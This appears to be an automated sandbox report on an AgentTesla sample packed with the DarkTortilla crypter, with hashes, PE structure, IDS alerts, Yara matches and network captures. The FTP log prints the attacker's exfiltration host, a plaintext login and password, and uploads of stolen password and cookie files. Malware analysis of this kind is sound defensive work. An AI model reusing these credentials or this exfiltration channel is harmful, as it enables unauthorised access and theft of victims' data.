SHA-512: 4F7B9BE379C98D5E9609D46FC0B473C66A977C3A081C60872CB8FE344C2785A285E9D9019D49515A6DC5D1E6EFF2D8DD5E5BA49086AF24F8A2F50E6B9EBE588B
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.8439810553697228
                              Encrypted:false
                              SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                              MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                              SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                              SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                              SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                              Malicious:false
                              Reputation:high, very likely benign file
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.6732424250451717
                              Encrypted:false
                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                              Malicious:false
                              Reputation:high, very likely benign file
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                              Category:modified
                              Size (bytes):98304
                              Entropy (8bit):0.08235737944063153
                              Encrypted:false
                              SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                              MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                              SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                              SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                              SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                              Malicious:false
                              Reputation:high, very likely benign file
                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.172396528538381
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                              • Win32 Executable (generic) a (10002005/4) 49.75%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Windows Screen Saver (13104/52) 0.07%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              File name:Xc501VOacR.exe
                              File size:832'512 bytes
                              MD5:08939a7fe1905c0c6e321e4e2cd90cad
                              SHA1:c463953c5f52e9bc0137513d69aa9294d84bde75
                              SHA256:61b9f5a1e4ef18ed559b55f51d5c17b51c90c9a75fb5f6523b6243ae2f5bf70c
                              SHA512:4cd3877461ae15143636fff08dc3dec2587451b45dc32857a5bc0dde53068f0b76158eb0e1519f401b93bd4e1c3e6c73144c83b9d59d406d8c0f011b4211e19e
                              SSDEEP:12288:+WB3yuZG8+De1kIse8LRWjrZCollIoNE8kgZu3pvK541rR:+WB3yuZGVteKRyjl6ikyCpvy41rR
                              TLSH:C205F18D03FC5AA0F67E1BB6C57621444B79B407B872E35C46C090FA9E73BE19992723
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g............................^.... ........@.. ....................... ............`................................
                              Icon Hash:00928e8e8686b000
                              Entrypoint:0x4cca5e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x670F2EDD [Wed Oct 16 03:11:25 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                              Instruction
                              jmp dword ptr [00402000h]
                              Name                                 | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xcca08         | 0x53         | .text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xce000         | 0x3bc        | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xd0000         | 0xc          | .reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_TLS            | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_IAT            | 0x2000          | 0x8          | .text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008          | 0x48         | .text
                              IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
                              Name   | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type | Entropy             | Characteristics
                              .text  | 0x2000          | 0xcaa64      | 0xcac00  | ac9c90ea508f45f9fc21f4a54fe28168 | False    | 0.7664763313039458 | data      | 7.180225181330332   | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc  | 0xce000         | 0x3bc        | 0x400    | a184d21672e45ed80b966123db680911 | False    | 0.416015625        | data      | 3.2879534986852215  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc | 0xd0000         | 0xc          | 0x200    | 898c66a0f79080e4bd5444aa28d3eb1b | False    | 0.044921875        | data      | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                              Name       | RVA     | Size  | Type | Language | Country | ZLIB Complexity
                              RT_VERSION | 0xce058 | 0x364 | data |          |         | 0.44930875576036866
                              DLL         | Import
                              mscoree.dll | _CorExeMain
                              Timestamp                        | SID     | Signature                                    | Severity | Source IP   | Source Port | Dest IP        | Dest Port | Protocol
                              2024-12-05T17:23:33.528204+0100 | 2029927 | ET MALWARE AgentTesla Exfil via FTP          | 1        | 192.168.2.5 | 49830       | 162.241.203.30 | 21        | TCP
                              2024-12-05T17:23:34.458512+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1        | 192.168.2.5 | 49839       | 162.241.203.30 | 31261     | TCP
                              2024-12-05T17:23:34.578813+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1        | 192.168.2.5 | 49839       | 162.241.203.30 | 31261     | TCP
                              Timestamp                          | Source Port | Dest Port | Source IP      | Dest IP
                              Dec 5, 2024 17:23:29.929363012 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:30.051827908 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:30.051950932 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:31.216428041 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:31.220483065 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:31.340378046 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:31.552659988 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:31.552870035 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:31.672677994 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:31.988568068 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:31.988830090 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:32.108639956 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:32.320930004 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:32.321100950 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:32.443795919 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:32.656141996 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:32.656347990 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:32.778851032 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:33.058692932 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:33.059340954 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:33.179215908 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:33.407402992 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:33.408159018 CET | 49839       | 31261     | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:33.459860086 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:33.528017044 CET | 31261       | 49839     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:33.528107882 CET | 49839       | 31261     | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:33.528203964 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:33.647989035 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:34.458266020 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:34.458512068 CET | 49839       | 31261     | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:34.458585978 CET | 49839       | 31261     | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:34.506769896 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:34.578353882 CET | 31261       | 49839     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:34.578743935 CET | 31261       | 49839     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:34.578813076 CET | 49839       | 31261     | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:34.794064999 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:34.834839106 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:34.845534086 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:34.965620995 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:35.178128958 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:35.178561926 CET | 49843       | 31714     | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:35.225495100 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:35.298357964 CET | 31714       | 49843     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:35.298522949 CET | 49843       | 31714     | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:35.298599958 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:35.419284105 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:36.231868982 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:36.232080936 CET | 49843       | 31714     | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:36.232117891 CET | 49843       | 31714     | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:36.272425890 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:36.351897955 CET | 31714       | 49843     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:36.351974964 CET | 31714       | 49843     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:36.351984978 CET | 31714       | 49843     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:36.352466106 CET | 31714       | 49843     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:36.352623940 CET | 49843       | 31714     | 192.168.2.5    | 162.241.203.30
                              Dec 5, 2024 17:23:36.564851999 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5
                              Dec 5, 2024 17:23:36.616097927 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30
                              Timestamp                          | Source Port | Dest Port | Source IP   | Dest IP
                              Dec 5, 2024 17:23:29.778970003 CET | 61774       | 53        | 192.168.2.5 | 1.1.1.1
                              Dec 5, 2024 17:23:29.917587996 CET | 53          | 61774     | 1.1.1.1     | 192.168.2.5
                              Timestamp                          | Source IP   | Dest IP | Trans ID | OP Code            | Name                       | Type           | Class       | DNS over HTTPS
                              Dec 5, 2024 17:23:29.778970003 CET | 192.168.2.5 | 1.1.1.1 | 0xf73    | Standard query (0) | ftp.aminhacorretora.com.br | A (IP address) | IN (0x0001) | false
                              Timestamp                          | Source IP | Dest IP     | Trans ID | Reply Code   | Name                       | CName                  | Address        | Type                   | Class       | DNS over HTTPS
                              Dec 5, 2024 17:23:29.917587996 CET | 1.1.1.1   | 192.168.2.5 | 0xf73    | No error (0) | ftp.aminhacorretora.com.br | aminhacorretora.com.br |                | CNAME (Canonical name) | IN (0x0001) | false
                              Dec 5, 2024 17:23:29.917587996 CET | 1.1.1.1   | 192.168.2.5 | 0xf73    | No error (0) | aminhacorretora.com.br     |                        | 162.241.203.30 | A (IP address)         | IN (0x0001) | false
                              Timestamp                          | Source Port | Dest Port | Source IP      | Dest IP        | Commands
                              Dec 5, 2024 17:23:31.216428041 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5    | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                 |             |           |                |                | 220-You are user number 10 of 150 allowed.
                                                                 |             |           |                |                | 220-Local time is now 13:23. Server port: 21.
                                                                 |             |           |                |                | 220-IPv6 connections are also welcome on this server.
                                                                 |             |           |                |                | 220 You will be disconnected after 15 minutes of inactivity.
                              Dec 5, 2024 17:23:31.220483065 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30 | USER logsftp@aminhacorretora.com.br
                              Dec 5, 2024 17:23:31.552659988 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5    | 331 User logsftp@aminhacorretora.com.br OK. Password required
                              Dec 5, 2024 17:23:31.552870035 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30 | PASS _yA=,M5*J?KH
                              Dec 5, 2024 17:23:31.988568068 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5    | 230 OK. Current restricted directory is /
                              Dec 5, 2024 17:23:32.320930004 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5    | 504 Unknown command
                              Dec 5, 2024 17:23:32.321100950 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30 | PWD
                              Dec 5, 2024 17:23:32.656141996 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5    | 257 "/" is your current location
                              Dec 5, 2024 17:23:32.656347990 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30 | TYPE I
                              Dec 5, 2024 17:23:33.058692932 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5    | 200 TYPE is now 8-bit binary
                              Dec 5, 2024 17:23:33.059340954 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30 | PASV
                              Dec 5, 2024 17:23:33.407402992 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5    | 227 Entering Passive Mode (162,241,203,30,122,29)
                              Dec 5, 2024 17:23:33.528203964 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30 | STOR PW_user-376483_2024_12_05_11_23_28.html
                              Dec 5, 2024 17:23:34.458266020 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5    | 150 Accepted data connection
                              Dec 5, 2024 17:23:34.794064999 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5    | 226-File successfully transferred
                                                                 |             |           |                |                | 226 0.336 seconds (measured here), 0.93 Kbytes per second
                              Dec 5, 2024 17:23:34.845534086 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30 | PASV
                              Dec 5, 2024 17:23:35.178128958 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5    | 227 Entering Passive Mode (162,241,203,30,123,226)
                              Dec 5, 2024 17:23:35.298599958 CET | 49830       | 21        | 192.168.2.5    | 162.241.203.30 | STOR CO_user-376483_2024_12_05_11_23_33.zip
                              Dec 5, 2024 17:23:36.231868982 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5    | 150 Accepted data connection
                              Dec 5, 2024 17:23:36.564851999 CET | 21          | 49830     | 162.241.203.30 | 192.168.2.5    | 226-File successfully transferred
                                                                 |             |           |                |                | 226 0.335 seconds (measured here), 9.97 Kbytes per second


                              Target ID:0
                              Start time:11:22:18
                              Start date:05/12/2024
                              Path:C:\Users\user\Desktop\Xc501VOacR.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Xc501VOacR.exe"
                              Imagebase:0x5a0000
                              File size:832'512 bytes
                              MD5 hash:08939A7FE1905C0C6E321E4E2CD90CAD
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2703482348.0000000005550000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2701624311.0000000003F6D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.2701624311.000000000403E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2694977464.0000000002DF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:4
                              Start time:11:22:52
                              Start date:05/12/2024
                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                              Imagebase:0xa50000
                              File size:42'064 bytes
                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.3285495307.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.3287976378.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:moderate
                              Has exited:false


                                Execution Graph

                                Execution Coverage:14%
                                Dynamic/Decrypted Code Coverage:97.7%
                                Signature Coverage:5.3%
                                Total number of Nodes:132
                                Total number of Limit Nodes:6

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2707451290.0000000008230000.00000040.00000800.00020000.00000000.sdmp, Offset: 08230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8230000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: (aq$Haq$Haq$Haq$Haq$Haq$Haq$PH]q
                                • API String ID: 0-1363861295
                                • Opcode ID: 251de6848d4a536badf8f2d1eba49d527b4122fe75c7e4afdff6e216cd471207
                                • Instruction ID: 14e87c31b0a9499a787c27f6b3b9f59452f28b0297d15bf2401574a8eef5a769
                                • Opcode Fuzzy Hash: 251de6848d4a536badf8f2d1eba49d527b4122fe75c7e4afdff6e216cd471207
                                • Instruction Fuzzy Hash: F472D1717102258FCB58DB78C8A476E7BA7EF84711F1485AAD506CB3A5CE34DC06CBA1

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705387241.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7470000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: @$@$G
                                • API String ID: 0-3628805992
                                • Opcode ID: 478dea73a1b27b54b6a154211ae85133e51d72e178f42b3c4cad7974e1ce053b
                                • Instruction ID: 66915899b335b66f931212f7979b6e5d4e071699803f859248526dc471d4a446
                                • Opcode Fuzzy Hash: 478dea73a1b27b54b6a154211ae85133e51d72e178f42b3c4cad7974e1ce053b
                                • Instruction Fuzzy Hash: 3B537AB0A152598FCB55FF78DC8969CBBB2EB85304F8084E9D448B7340DE386D85CB66

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dae85729a9e9e2d0493759d14bc5347482b9a09561998bafd8d34576f325e9ca
                                • Instruction ID: 3370997292b506d32d168f854886c4fd785cbd72bb92cce73ea8978dcab971c5
                                • Opcode Fuzzy Hash: dae85729a9e9e2d0493759d14bc5347482b9a09561998bafd8d34576f325e9ca
                                • Instruction Fuzzy Hash: 61B31570A116298FCB58EF38ED896ACBBB2FB89305F4049ADD049A7354DB345D85CF42

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000000.00000002.2707648230.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8250000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d73fcc4328579f95d3cf612ba4e8351b0fc0f8fd18f0bafb2e048689ac441023
                                • Instruction ID: d90c555834399f1512883a18404274a83fc3a23949392a6ac0fda4fc2121528b
                                • Opcode Fuzzy Hash: d73fcc4328579f95d3cf612ba4e8351b0fc0f8fd18f0bafb2e048689ac441023
                                • Instruction Fuzzy Hash: 2DB31570A116298FCB58EF38ED896ACBBB2FB89305F4049ADD049A7354DB345D85CF42

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2694497413.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2cd0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: (o]q$(o]q$,aq$,aq
                                • API String ID: 0-1947289240
                                • Opcode ID: d96f2e2b9b1de17b1885b6df4dfdac5a56bad3608dd482e0d52ed4950ce4d0da
                                • Instruction ID: d04a22c414496238c8da1e1683c58561943ac68a0594e7902526a02336fe3ee9
                                • Opcode Fuzzy Hash: d96f2e2b9b1de17b1885b6df4dfdac5a56bad3608dd482e0d52ed4950ce4d0da
                                • Instruction Fuzzy Hash: 0BD14D71A00109DFDB14CFA9D884AADBBF6FF88344F558269E505AB2A4DB30ED42CF50

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000000.00000002.2707451290.0000000008230000.00000040.00000800.00020000.00000000.sdmp, Offset: 08230000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_8230000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5adab0d22def2ed01c7c92266007b3d972d042ca438f55658f785d55b6f1c08d
                                • Instruction ID: 8c45ae3ddcd08c5b49032bdefe848e5173dabd36e89e769398fc8048d7fcd987
                                • Opcode Fuzzy Hash: 5adab0d22def2ed01c7c92266007b3d972d042ca438f55658f785d55b6f1c08d
                                • Instruction Fuzzy Hash: 6DB30970A516298FCB58FF38E9986ACBBB2FB84300F4085ADD489A7355DF305D858F85

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: e\1$e\1$"*p$"*p
                                • API String ID: 0-1513742261
                                • Opcode ID: 16d08c67cb5ba7ecf025ab01762e3236b2f3e050cc4f2ff3315dec6c5590bc20
                                • Instruction ID: 44e72ce8f66074b3d62e0af7c36132cd1a8ab3bac3ad0288176af65dc0d5cb9a
                                • Opcode Fuzzy Hash: 16d08c67cb5ba7ecf025ab01762e3236b2f3e050cc4f2ff3315dec6c5590bc20
                                • Instruction Fuzzy Hash: FA81F1B0D112198FCB14CFE5D9446EEFBB2AF99300F24942ED41ABB254DB349A42CF64
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2705597487.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_78c0000_Xc501VOacR.jbxd
                                Similarity
                                • API ID:
                                • String ID: 6f$6f$$]q
                                • API String ID: 0-3010377955
                                • Opcode ID: be9712c038a5f94661b3eb5ed866fd933ed5b9346e21d5bd0d80dbf6f1c98068
